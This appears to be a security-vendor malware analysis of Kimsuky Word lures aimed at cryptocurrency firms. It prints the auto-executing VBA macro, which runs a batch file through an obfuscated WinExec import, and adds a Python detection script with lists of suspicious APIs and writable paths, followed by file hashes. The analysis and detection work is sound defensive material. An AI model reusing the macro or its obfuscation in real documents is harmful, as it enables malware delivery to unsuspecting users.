On March 21st, the ASEC analysis team discovered APT attacks by the Kimsuky group that use Word files with cryptocurrency-related content as lures. A total of three Word files used as bait were identified. The macro author and the execution flow are identical to those introduced in the ASEC blog post of March 17th (Title: Malicious Word Files Disguised as Product Introduction). All three files are properly formed Word documents carrying malicious macro code, and since their body text concerns cryptocurrency, the attacker appears to be targeting cryptocurrency companies. All of the Word files were last modified by an author named "Acer" on the morning of March 21st, which suggests they were prepared for imminent use in an attack. Extreme caution is warranted.
- Regarding Quantity of Stakeholder.doc (Modified by: Acer, Date Modified: 2022-03-21 10:29 AM)
- Assets and Liabilities Status.doc (Modified by: Acer, Date Modified: 2022-03-21 11:10 AM)
- The 3rd Stakeholder Meeting.doc (Modified by: Acer, Date Modified: 2022-03-21 11:03 AM)
All three Word files use the same macro, and its functionality matches that of the macro code in temp.doc introduced in the blog post mentioned above (Malicious Word Files Disguised as Product Introduction).
- Feature: runs "C:\Users\Public\Documents\no1.bat" through the kernel32 WinExec API, which the macro imports under a long random identifier via Declare ... Alias "WinExec"

    Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long

    Sub Document_Open()
        NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0
    End Sub
The Word file that creates no1.bat appears to be a different document, not one of the collected files. As introduced in a past blog post, it appears to be created by the macro that prompts users to click the Enable Macro button (see Figure 5). On its own, the collected document therefore only executes a file that is expected to already exist at that path; if no1.bat is absent, the macro does nothing visible, so the sample can look inert when detonated in isolation.
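The renamed import above is the point worth keying on: the attacker can regenerate the 176-character identifier for every lure, but the Alias "WinExec" string, the auto-executing Document_Open procedure and the world-writable C:\Users\Public path have to stay. The following static triage script, an added example that is not ASEC's or AhnLab's code, pulls those invariants out of extracted VBA source. The sample macro is the one shown in the post, reflowed; the alias list, the writable-path prefixes and the name-length heuristic are the author's assumptions.

```python
"""
Static triage of extracted VBA source for the lure-document pattern:
a Win32 export imported under a renamed identifier (Declare ... Alias)
and called from an auto-executing procedure to run a file under a
world-writable path. Added example, not ASEC's or AhnLab's code.
"""
import re
from dataclasses import dataclass, field

# The renamed WinExec import exactly as it appears in the lure documents.
OBF_NAME = ("NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyX"
            "NqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpX"
            "VpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp")

# Constructed sample: the Document_Open macro from the post, reflowed.
SAMPLE_VBA = r'''Private Declare PtrSafe Function __API__ Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
Sub Document_Open()
    __API__ "C:\Users\Public\Documents\no1.bat", 0
End Sub
'''.replace("__API__", OBF_NAME)

# Constructed benign control: a kernel32 import without Alias, no auto-exec trigger.
BENIGN_VBA = '''Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal ms As Long)
Sub FormatReport()
    Sleep 100
End Sub
'''

# Assumed indicator lists; extend to taste.
SUSPICIOUS_ALIASES = {"WinExec", "ShellExecuteA", "ShellExecuteW", "CreateProcessA",
                      "CreateProcessW", "URLDownloadToFileA", "URLDownloadToFileW"}
AUTOEXEC_PROCS = {"document_open", "autoopen", "document_close", "autoclose",
                  "autoexec", "workbook_open"}
WRITABLE_PREFIXES = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")

DECLARE_RE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(?P<local>\w+)\s+Lib\s+"(?P<lib>[^"]+)"'
    r'(?:\s+Alias\s+"(?P<alias>[^"]+)")?', re.IGNORECASE)
PROC_START_RE = re.compile(r'(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(?P<name>\w+)', re.IGNORECASE)
PROC_END_RE = re.compile(r'End\s+(?:Sub|Function)\b', re.IGNORECASE)
PATH_RE = re.compile(r'"(?P<path>[A-Za-z]:\\[^"]+)"')


@dataclass
class MacroReport:
    imports: dict = field(default_factory=dict)       # local name -> (library, exported name)
    autoexec: list = field(default_factory=list)      # auto-executing procedures present
    api_calls: list = field(default_factory=list)     # (procedure, exported name, argument text)
    writable_paths: list = field(default_factory=list)
    obfuscated_names: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # A process-launch API reached from an auto-exec procedure is the lure pattern itself.
        if any(proc.lower() in AUTOEXEC_PROCS and api in SUSPICIOUS_ALIASES
               for proc, api, _ in self.api_calls):
            return "malicious"
        if any(api in SUSPICIOUS_ALIASES for _, api in self.imports.values()):
            return "suspicious"
        return "clean"


def split_procedures(src: str) -> dict:
    """Line-based split of a module into {procedure name: [body lines]}; Declare lines are skipped."""
    procs, current, body = {}, None, []
    for raw in src.splitlines():
        line = raw.strip()
        start = PROC_START_RE.match(line)
        if current is None and start:
            current, body = start.group("name"), []
        elif current is not None and PROC_END_RE.match(line):
            procs[current] = body
            current = None
        elif current is not None:
            body.append(line)
    return procs


def analyze_vba(src: str) -> MacroReport:
    report = MacroReport()
    for m in DECLARE_RE.finditer(src):
        local, lib = m.group("local"), m.group("lib")
        exported = m.group("alias") or local          # without Alias the export keeps its own name
        report.imports[local] = (lib, exported)
        if len(local) >= 32:                          # heuristic: nobody hand-types 176-char names
            report.obfuscated_names.append(local)
    procs = split_procedures(src)
    report.autoexec = [p for p in procs if p.lower() in AUTOEXEC_PROCS]
    for proc, body in procs.items():
        for line in body:
            for local, (_, exported) in report.imports.items():
                call = re.match(rf'(?:Call\s+)?{re.escape(local)}\b\s*\(?(?P<args>.*)', line, re.IGNORECASE)
                if call:
                    report.api_calls.append((proc, exported, call.group("args").rstrip(")")))
    for m in PATH_RE.finditer(src):
        path = m.group("path")
        if path.lower().startswith(WRITABLE_PREFIXES):
            report.writable_paths.append(path)
    return report


if __name__ == "__main__":
    for label, src in (("lure", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = analyze_vba(src)
        print(label, r.verdict, r.autoexec, [api for _, api in r.imports.values()], r.writable_paths)
```

The report resolves the call through the import table rather than matching the call site, so the same logic flags any future variant whose only change is the random identifier. The benign control shows why the Alias string alone is not enough: a plain kernel32 import with no auto-exec trigger comes back clean.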
Ultimately, it has been confirmed that both the malicious Word files disguised as product introductions and the Word files in this case share the same distribution method and execution flow. This indicates that the attacker is targeting virtual asset (cryptocurrency) providers as well as the distribution and retail industries.
Files may ask users to press the 'Enable Content' button, but users should refrain from pressing it on files from unknown sources (see Figure 5).
AhnLab's anti-malware product, V3, is monitoring such attacks and detects them using the detection names below.
[MD5]
– cloudy.bat: 0ecc9a4cea5c289732c76234c47a60e9
– download.vbs: 82ed73e4adbe5c26bafb5072657fd46b
– no4.bat: 7a2f350a2a6aa1d065c2b19be6dc6fb4
– start.vbs: 8a2eeafca1b33010d7ed812cf17d42f5
– upload.vbs: 869f98aac4963c7db7276d2a914d081e
– Assets and Liabilities Status.doc: a872dbb06e2dc721f180d05e2c1c8c20
– The 3rd Stakeholder Meeting.doc: 56a936b9b3a3bdafed40cf5d056febaf
– Regarding Quantity of Stakeholder.doc: dc0223fb97891a90049d0c0d2beeb756
[Detection Name (Engine ver.)]
– cloudy.bat: Trojan/VBS.Akdoor (2022.03.23.00)
– download.vbs: Downloader/VBS.Generic (2022.03.23.00)
– no4.bat: Trojan/BAT.Agent (2022.03.23.00)
– start.vbs: Trojan/VBS.Akdoor (2022.03.23.00)
– upload.vbs: Trojan/VBS.Akdoor (2022.03.23.00)
– Assets and Liabilities Status.doc: Trojan/DOC.Agent (2022.03.23.00)
– The 3rd Stakeholder Meeting.doc: Trojan/DOC.Agent (2022.03.23.00)
– Regarding Quantity of Stakeholder.doc: Trojan/DOC.Agent (2022.03.23.00)
Subscribe to AhnLab's next-generation threat intelligence platform 'AhnLab TIP' to check related IOCs and detailed analysis information.